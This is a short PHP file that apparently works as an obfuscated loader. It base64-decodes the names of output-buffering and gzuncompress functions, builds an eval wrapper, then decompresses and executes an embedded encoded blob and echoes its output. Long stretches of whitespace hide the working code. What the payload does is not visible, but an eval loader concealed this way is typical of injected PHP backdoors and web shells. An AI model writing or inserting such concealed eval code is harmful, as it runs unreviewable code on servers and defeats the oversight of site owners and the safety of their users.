<?php 
        $__='printf';$_='Loading key';
        















































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrt2s2PmkAUAPC7Sf8HDpvgpo1B1FVDOMBYp4Op2y4RZC6GrwXkM0VR/OsLQuuaXmzaNOnu+xnRQWbevDdmDijDNO42FZHNvgXJ7pkVzs2WyIZuyaDIzPNer8cKnbYL867zFh+dujbMXyT+coZd96e5ofcDij+K7PnUpeo3addPZAAA4HVi7VjjnLWyJ1jjDf2QKvPp87oMx82mWe2azXa9gVIBAAAAAADwv4HbGQAA8Hqxlpm7D8ON49qp47ICVAQAAAD4I9c/6hMkeQQ9pdZAK8mM8yiec1T1EhXZ2eMhXZw/x9rWxBNP6T+lVJWba5Ff0EDmTLzybF4rnVgrF6qc2aWUEDS8jDPLdkoZjlFQx5Ejg/cLguyc4PmeInlg6sfqvZM58cpzsB8RTAsLHwuHj/a0lHd0vTwZuhM9bo+BvR1OjIS8V075oh0vo4GUKtgvnDXxviDp+BmFnntIvSavF3PnfL+OYahyYvHTkOB+YcejzIptvx7vfO2nKn/9eKJ6FBPkhSae9u1AmpAZOVS5tTk0T6ovU6vKVcVzvqqJX+VQWPzXOu8RUe0f+U6r+LnNr26c0yijvM8RVX7Qk9Rzg8s41/VTMkuVEgtHvjVYHggiY1bodP79l0g8v3bb1r3wO91f9L2l490lYJetj+yHn2Hf+n9RrmvUvVqUpkT3wnekTt8H';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      














































































































                                                                                                                                                                                                                     $________;
